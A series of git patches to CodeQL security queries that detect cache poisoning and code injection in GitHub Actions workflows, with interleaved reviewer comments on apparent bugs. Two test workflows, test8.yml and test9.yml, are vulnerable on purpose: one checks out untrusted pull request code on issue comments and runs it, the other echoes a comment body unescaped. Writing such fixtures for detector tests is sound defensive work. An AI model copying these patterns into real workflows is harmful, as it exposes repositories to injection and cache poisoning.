@@ -22,13 +22,16 @@ where // TODO: (require to collect trigger types) // - add push to default branch? // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - j.getEnclosingWorkflow() - .hasTriggerEvent([ - "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", - "gollum", "issue_comment", "issues", "label", "milestone", "project", "project_card", - "project_column", "public", "pull_request_comment", "pull_request_target", - "repository_dispatch", "schedule", "watch", "workflow_run" - ]) and + ( + j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) + or + j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = j.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + caller.hasTriggerEvent(defaultBranchTriggerEvent()) + ) + ) and // The job checkouts untrusted code from a pull request j.getAStep() = checkout and ( @@ -40,4 +43,4 @@ where // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() instanceof PoisonableStep ) -select j.getAStep().(CacheWritingStep), "Potential cache poisoning on privileged workflow." +select checkout, "Potential cache poisoning on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml new file mode 100644 index 00000000000..68d3f7f75ac --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml @@ -0,0 +1,19 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - run: | + ./checkedout/poison + 
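Review bot: The `workflow_call` branch added to the `where` clause inspects only the direct caller: `caller.hasTriggerEvent(defaultBranchTriggerEvent())` does not hold when the caller is itself a reusable workflow started by `workflow_call`, so a job reached through nested reusable workflows goes unreported. A recursive helper predicate would cover the whole chain and could be shared by every query that needs this condition. Separately, `defaultBranchTriggerEvent()` is not defined anywhere in this patch, so unless it already exists elsewhere the query does not compile until the patch that introduces it is applied. The `where` clause starts and ends outside the hunk.

```ql
/** Holds if `w` runs in the context of the default branch, directly or through a chain of `workflow_call` callers. */
predicate runsOnDefaultBranch(Workflow w) {
  w.hasTriggerEvent(defaultBranchTriggerEvent())
  or
  w.hasTriggerEvent("workflow_call") and
  exists(ExternalJob call |
    call.getCallee() = w.getLocation().getFile().getRelativePath() and
    runsOnDefaultBranch(call.getWorkflow())
  )
}

// … unchanged: from clause and TODO comments of the where clause …
  runsOnDefaultBranch(j.getEnclosingWorkflow()) and
// … unchanged: checkout conditions and select …
```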
From fafb44d4f662f551e1c0d7cc3969cd4a08df43f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 15:20:48 +0200 Subject: [PATCH 0249/1267] Add CachePoisoning by Code Injection query --- .../actions/security/CachePoisoningQuery.qll | 17 ++++++++ .../CWE-349/CachePoisoningByCodeInjection.ql | 41 +++++++++++++++++++ .../CWE-349/.github/workflows/test9.yml | 12 ++++++ .../Security/CWE-349/CachePoisoning.expected | 11 ++--- .../CachePoisoningByCodeInjection.expected | 6 +++ .../CachePoisoningByCodeInjection.qlref | 2 + 6 files changed, 84 insertions(+), 5 deletions(-) create mode 100644 ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 6668ef9777d..9762e9d9078 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,5 +1,15 @@ import actions +string defaultBranchTriggerEvent() { + result = + [ + "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum", + "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column", + "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule", + "watch", "workflow_run" + ] +} + abstract class CacheWritingStep extends Step { } class CacheActionUsesStep extends CacheWritingStep, UsesStep { 
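Review bot: `defaultBranchTriggerEvent()` has no QLDoc, although this list is the only place that states which events the cache-poisoning queries treat as running on the default branch. I would add `/** Gets the name of a trigger event for which the workflow runs in the context of the default branch. */` above it. As far as I know `pull_request_comment` is not an event GitHub dispatches (its documentation redirects to `issue_comment`), so that entry is probably dead and worth confirming and dropping.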
@@ -60,3 +70,10 @@ class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { ) } } + +class SetupRubyUsesStep extends CacheWritingStep, UsesStep { + SetupRubyUsesStep() { + this.getCallee() = ["actions/setup-ruby", "ruby/setup-ruby"] and + this.getArgument("bundler-cache") = "true" + } +} diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql new file mode 100644 index 00000000000..2de07ec17bd --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql 
@@ -0,0 +1,41 @@
+/**
+ * @name Cache Poisoning via low-privilege code injection
+ * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack.
+ * @kind path-problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 9.3
+ * @id actions/cache-poisoning/code-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-349
+ * external/cwe/cwe-094
+ */
+
+import actions
+import codeql.actions.security.CodeInjectionQuery
+import codeql.actions.security.CachePoisoningQuery
+import CodeInjectionFlow::PathGraph
+
+from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j
+where
+ CodeInjectionFlow::flowPath(source, sink) and
+ j = sink.getNode().asExpr().getEnclosingJob() and
+ not j.isPrivileged() and
+ // The workflow runs in the context of the default branch
+ // TODO: (require to collect trigger types)
+ // - add push to default branch?
+ // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch
+ (
+ j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent())
+ or
+ j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and
+ exists(ExternalJob call, Workflow caller |
+ call.getCallee() = j.getLocation().getFile().getRelativePath() and
+ caller = call.getWorkflow() and
+ caller.hasTriggerEvent(defaultBranchTriggerEvent())
+ )
+ )
+select sink.getNode(), source, sink,
+ "Potential code injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml
new file mode 100644
index 00000000000..3b646b795ac
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml
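Review bot: The `select` message never mentions the cache, so a result reads like a plain code-injection alert even though the query is limited to jobs where `not j.isPrivileged()` holds and its `@name` is about cache poisoning. A message such as `"Unprivileged code injection in $@, which may lead to cache poisoning."` would tell the reader why a finding in a job without write permissions or secrets still matters. The `@description` is also circular ("the cache can be poisoned ... leading to a cache poisoning attack") and could name the consequence instead. The default-branch condition in the `where` clause is a verbatim copy of the one in CachePoisoning.ql; moving it into a predicate in CachePoisoningQuery.qll would keep the two queries from drifting apart.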
@@ -0,0 +1,12 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + permissions: {} + steps: + - run: | + echo ${{ github.event.comment.body }} + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 6e0030ad383..67cdea32c5d 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,5 +1,6 @@ -| .github/workflows/test1.yml:17:9:21:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test2.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test3.yml:12:9:20:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test6.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test7.yml:12:9:15:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test6.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test7.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test8.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected new file mode 100644 index 00000000000..5f244aa2faf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected 
@@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref new file mode 100644 index 00000000000..cd1a90049a6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningByCodeInjection.ql + From 409a6aa1373db2063058cdc14a59c3d3887895ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 18:48:16 +0200 Subject: [PATCH 0250/1267] Update ql/src/Security/CWE-349/CachePoisoning.ql MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index bf18df4797d..a1436fd6fe3 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -43,4 +43,4 @@ where // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() instanceof PoisonableStep ) -select checkout, "Potential cache poisoning on privileged workflow." +select checkout, "Potential cache poisoning of a default branch." From e8f2bc3ef69f2a7171c7442a06ffc13b920d06ae Mon Sep 17 00:00:00 2001 
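Review bot: The alert text changes in this `select`, but `CachePoisoning.expected` is not part of the patch (the diffstat lists one file) and the rows written by the previous patch still read `Potential cache poisoning on privileged workflow.`. The CWE-349 query test therefore presumably fails until the expectations are regenerated, unless a later patch does that. Each of the six rows needs the new text, for example `| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning of a default branch. |`. The `where` clause this `select` belongs to starts outside the hunk.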
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:32:11 +0200 Subject: [PATCH 0251/1267] Remove debug method --- ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 2 -- 1 file changed, 2 deletions(-) diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 0db8d63e6f3..ba6430f157f 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -295,5 +295,3 @@ private class InputTree extends LeafTree instanceof Input { } private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { } private class ExpressionLeaf extends LeafTree instanceof Expression { } - -predicate test(ScalarValueLeaf f) { any() } From ddf72a2cf3c03fc38210a21a48694cf9142c826c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:32:24 +0200 Subject: [PATCH 0252/1267] Add more poisonable steps --- ql/lib/codeql/actions/security/PoisonableSteps.qll | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 130879a7cb6..f65bf5fb4dc 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -43,12 +43,19 @@ class LocalCommandExecutionRunStep extends PoisonableStep, Run { or // sh xxxx cmd = line.regexpCapture("(^|\\s+)(ba|z|fi)?sh\\s+(.*)", 3) + or + // node xxxx + cmd = line.regexpCapture("(^|\\s+)(node|python|ruby|go)\\s+(.*)", 3) ) } string getCommand() { result = cmd } } +class LocalActionUsesStep extends PoisonableStep, UsesStep { + LocalActionUsesStep() { this.getCallee().matches("./%") } +} + class EnvVarInjectionRunStep extends PoisonableStep, Run { EnvVarInjectionRunStep() { exists(string value | From f95a3e5298633558718b462d195a4308df1e1cd1 Mon Sep 17 00:00:00 2001 
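Review bot: The new interpreter pattern in `LocalCommandExecutionRunStep` requires whitespace directly after the name, so versioned names such as `python3 script.py` are not recognised as a poisonable step, and the comment above it still says only `// node xxxx`. Consider `cmd = line.regexpCapture("(^|\\s+)(node|python[0-9.]*|ruby|go)\\s+(.*)", 3)` with the comment `// node|python|ruby|go xxxx`. The pattern also captures invocations that do not execute checked-out files by themselves, such as `go version`; whether that produces noise depends on how `getCommand()` is consumed, which is outside the hunk. The enclosing class starts outside the hunk.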
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:33:06 +0200 Subject: [PATCH 0253/1267] Refactor eventtrigger and privileged methods Move them from Workflows to Jobs --- ql/lib/codeql/actions/Ast.qll | 7 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 175 +++++++++++------- .../PrivilegedUntrustedCheckoutCritical.ql | 7 +- .../PrivilegedUntrustedCheckoutHigh.ql | 7 +- 4 files changed, 126 insertions(+), 70 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index bfbc990d671..7d10f29af50 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -261,8 +261,6 @@ class Workflow extends AstNode instanceof WorkflowImpl { Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } - - predicate isPrivileged() { super.isPrivileged() } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { @@ -288,6 +286,7 @@ class Outputs extends AstNode instanceof OutputsImpl { } class Permissions extends AstNode instanceof PermissionsImpl { + bindingset[perm] string getPermission(string perm) { result = super.getPermission(perm) } string getAPermission() { result = super.getAPermission() } @@ -329,6 +328,10 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } + predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } + + string getATriggerEvent() { result = super.getATriggerEvent() } + Strategy getStrategy() { result = super.getStrategy() } predicate isPrivileged() { super.isPrivileged() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0cbb8ab10ed..e9989bf6e93 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
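Review bot: `Job.hasTriggerEvent` and `Job.getATriggerEvent` delegate to `JobImpl`, whose `hasTriggerEvent` in this same patch evaluates `n.lookup("on")`; if `n` is the job's own mapping, as `TJobNode` suggests, that key is never present because `on` is declared at workflow level, so the predicate would never hold. `hasPrivilegedTrigger()` relies on counting `getATriggerEvent()` results, so if that predicate is written the same way, jobs without explicit permissions would not be classified as privileged and the privileged-checkout queries would miss them. Delegating to the workflow avoids this: `predicate hasTriggerEvent(string trigger) { this.getEnclosingWorkflow().hasTriggerEvent(trigger) }`. The `JobImpl` hunk runs past the visible part of the patch, so this should be checked against its remaining lines.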
@@ -64,7 +64,7 @@ private newtype TAstNode = TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or - TPermissionsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("permissions") = n) } or + TPermissionsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("permissions") = n) } or TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or @@ -320,6 +320,9 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { /** Gets a job within this workflow */ JobImpl getAJob() { result = this.getJob(_) } + /** Gets the permissions granted to this workflow. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + /** Workflow is triggered by given trigger event */ predicate hasTriggerEvent(string trigger) { exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) 
@@ -330,43 +333,8 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(result)) } - /** Gets the permissions granted to this workflow. */ - PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } - - private predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent() = trigger and - count(this.getATriggerEvent()) = 1 - } - /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } - - /** Holds if the workflow is privileged. */ - predicate isPrivileged() { - // The Workflow has a permission to write to some scope - this.getPermissions().getAPermission() = "write" - or - // The Workflow accesses a secret - exists(SecretsExpressionImpl expr | - expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" - ) - or - // The Workflow is triggered by an event other than `pull_request` - count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent() = ["pull_request", "workflow_call"] - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - this.hasSingleTrigger("workflow_call") and - exists(ExternalJobImpl call, WorkflowImpl caller | - call.getCallee() = this.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.isPrivileged() - ) - or - // The Workflow has multiple triggers so at least one is not "pull_request" - count(this.getATriggerEvent()) > 1 - } } class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { @@ -502,7 +470,7 @@ class OutputsImpl extends AstNodeImpl, TOutputsNode { } class PermissionsImpl extends AstNodeImpl, TPermissionsNode { - YamlMapping n; + YamlMappingLikeNode n; PermissionsImpl() { this = TPermissionsNode(n) } 
@@ -516,11 +484,41 @@ class PermissionsImpl extends AstNodeImpl, TPermissionsNode { override Location getLocation() { result = n.getLocation() } - override YamlMapping getNode() { result = n } + override YamlMappingLikeNode getNode() { result = n } - string getPermission(string perm) { result = n.lookup(perm).(YamlScalar).getValue() } + string getAScope() { + result = + [ + "actions", "attestations", "checks", "contents", "deployments", "discussions", "id-token", + "issues", "packages", "pages", "pull-requests", "repository-projects", "security-events", + "statuses" + ] + } - string getAPermission() { result = this.getPermission(_) } + string getAPermission() { + exists(YamlMapping mapping, string scope | + mapping = n and + result = scope + ": " + mapping.lookup(scope).(YamlScalar).getValue() + ) + or + exists(YamlScalar scalar | + scalar = n and + ( + scalar.getValue() = "write-all" and + result = this.getAScope() + ":write" + or + scalar.getValue() = "read-all" and + result = this.getAScope() + ":read" + ) + ) + } + + bindingset[perm] + string getPermission(string perm) { + exists(string p | + p = this.getAPermission() and p.matches(perm + ":%") and result = p.splitAt(":", 1).trim() + ) + } } class StrategyImpl extends AstNodeImpl, TStrategyNode { 
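Review bot: `getAPermission()` now returns two different shapes, `scope + ": " + value` for a mapping (`contents: write`) and `scope + ":write"` for `write-all`/`read-all`, and neither equals the bare `write` it returned before. `getPermission` hides the difference with `.trim()`, but any caller that still compares `getAPermission()` with `"write"` silently stops matching, which for a privilege check means missed results. I would build the mapping branch as `result = scope + ":" + mapping.lookup(scope).(YamlScalar).getValue()` so both branches agree, and document the contract with `/** Gets a granted permission formatted as scope:level, for example contents:write. */`. The class starts outside the hunk.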
@@ -633,37 +631,87 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } - /** Holds if the workflow is privileged. */ + /** Holds if the job is privileged. */ predicate isPrivileged() { - // the job has an explicit write permission - this.getPermissions().getAPermission() = "write" + // the job has privileged runtime permissions + this.hasRuntimeWritePermissions() or + // the job has an explicit secret accesses + this.hasExplicitSecretAccess() + or + // the job has an explicit write permission + this.hasExplicitWritePermission() + or + // the job has no explicit permissions but the workflow has write permissions + not exists(this.getPermissions()) and + this.hasImplicitWritePermission() + or + // neither the job nor the workflow have permissions but the job has a privileged trigger + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.hasPrivilegedTrigger() + } + + private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" ) - or - // the effective permissions have write access + } + + private predicate hasExplicitWritePermission() { + // the job has an explicit write permission + this.getPermissions().getAPermission().matches("%write") + } + + private predicate hasImplicitWritePermission() { + // the job has an explicit write permission + this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + } + + private predicate hasRuntimeWritePermissions() { + // the effective runtime permissions have write access exists(string path, string trigger, string name, string secrets_source, string perms | workflowDataModel(path, trigger, name, secrets_source, perms, _) and path.trim() = this.getLocation().getFile().getRelativePath() and 
name.trim().matches(this.getId() + "%") and // We cannot trust the permissions for pull_request events since they depend on the - // location of the head branch + // provenance of the head branch (local vs fork) not trigger.trim() = "pull_request" and - ( - secrets_source.trim().toLowerCase() = "actions" or - perms.toLowerCase().matches("%write%") - ) + perms.toLowerCase().matches("%write%") + ) + } + + private predicate hasPrivilegedTrigger() { + // For workflows that are triggered by the pull_request_target event, the GITHUB_TOKEN is granted read/write repository permission unless the permissions key is specified and the workflow can access secrets, even when it is triggered from a fork. + // The Job is triggered by an event other than `pull_request` + count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent() = ["pull_request", "workflow_call"] + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + this.hasSingleTrigger("workflow_call") and + exists(ExternalJobImpl call, JobImpl caller | + call.getCallee() = this.getLocation().getFile().getRelativePath() and + caller = call.getEnclosingJob() and + caller.isPrivileged() ) or - // The job has no expliclit permission, but the enclosing workflow is privileged - not exists(this.getPermissions()) and - not exists(SecretsExpressionImpl expr | - expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" - ) and - // The enclosing workflow is privileged - this.getEnclosingWorkflow().isPrivileged() + // The Workflow has multiple triggers so at least one is not "pull_request" + count(this.getATriggerEvent()) > 1 + } + + /** Workflow is triggered by given trigger event */ + predicate hasTriggerEvent(string trigger) { + exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) + } + + /** Gets the trigger event that starts this workflow. 
*/ + string getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + + private predicate hasSingleTrigger(string trigger) { + this.getATriggerEvent() = trigger and + count(this.getATriggerEvent()) = 1 } /** Gets the runs-on field of the job. */ @@ -825,11 +873,14 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { - result = - ( - u.getValue().regexpCapture(usesParser(), 1) + "/" + - u.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() + if u.getValue().matches("./%") + then result = u.getValue() + else + result = + ( + u.getValue().regexpCapture(usesParser(), 1) + "/" + + u.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql index 5c0528c4551..1181cd1e755 100644 --- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql @@ -17,10 +17,11 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from Workflow w, PRHeadCheckoutStep checkout +from LocalJob j, PRHeadCheckoutStep checkout where - w.isPrivileged() and - w.getAJob().(LocalJob).getAStep() = checkout and + j = checkout.getEnclosingJob() and + j.isPrivileged() and + j.getAStep() = checkout and checkout.getAFollowingStep() instanceof PoisonableStep and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql index e45075552ab..bf2cf129fbf 100644 
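Review bot: `hasTriggerEvent` resolves `on` through `n`, which in `JobImpl` appears to be the job's own mapping (the same `n` serves `n.lookup("strategy")` at the top of the hunk), and a job has no `on` key, so the predicate would never hold. `getATriggerEvent` directly below delegates to the enclosing workflow, and the same works here: `predicate hasTriggerEvent(string trigger) { this.getATriggerEvent() = trigger }`. The comment in `hasImplicitWritePermission` also still reads "the job has an explicit write permission" although the predicate inspects the enclosing workflow's permissions. In `hasPrivilegedTrigger` the caller is now bound via `call.getEnclosingJob()` on an `ExternalJobImpl`; if a job has no enclosing job, that `workflow_call` branch never matches and reusable workflows reached from privileged callers go unreported, so it deserves a test. `JobImpl` starts and ends outside the hunk.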
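Review bot: The QLDoc on `getCallee` still promises "the owner and name of the repository where the Action comes from", which no longer holds for the new `./` branch: it returns `u.getValue()` verbatim. That branch also skips the `.toLowerCase()` normalisation applied to repository references, so callers comparing callees get mixed-case local paths. Extend the doc with something like `For local actions (a value starting with ./) the path is returned unchanged.` and state whether the case difference is intended.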
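Review bot: Once `j = checkout.getEnclosingJob()` binds the job, the conjunct `j.getAStep() = checkout` looks redundant (unless `getAStep` is narrower than `getEnclosingJob`), and the `ControlCheck` clause just below still spells out `checkout.getEnclosingJob().getIf()` where `j.getIf()` would read better. The same applies to the matching hunk in PrivilegedUntrustedCheckoutHigh.ql. Privilege is now decided per job, yet the alert text recorded in the `.expected` files still says "on privileged workflow", so the wording should follow the new granularity. The `where` clause continues outside the hunk.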
--- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql @@ -17,10 +17,11 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from Workflow w, PRHeadCheckoutStep checkout +from LocalJob j, PRHeadCheckoutStep checkout where - w.isPrivileged() and - w.getAJob().(LocalJob).getAStep() = checkout and + j = checkout.getEnclosingJob() and + j.isPrivileged() and + j.getAStep() = checkout and not checkout.getAFollowingStep() instanceof PoisonableStep and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check From 2d09d1e6d88d0fa9198f3274505d02567acb5f45 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:34:30 +0200 Subject: [PATCH 0254/1267] Fix alert text --- ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 2de07ec17bd..e02b64e9ec5 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -37,5 +37,5 @@ where ) ) select sink.getNode(), source, sink, - "Potential code injection in $@, which may be controlled by an external user.", sink, + "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 44377acb0811775441b855ed214132ff6d283813 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:35:06 +0200 Subject: [PATCH 0255/1267] Improve Cache Poisoning quer --- ql/src/Security/CWE-349/CachePoisoning.ql | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) 
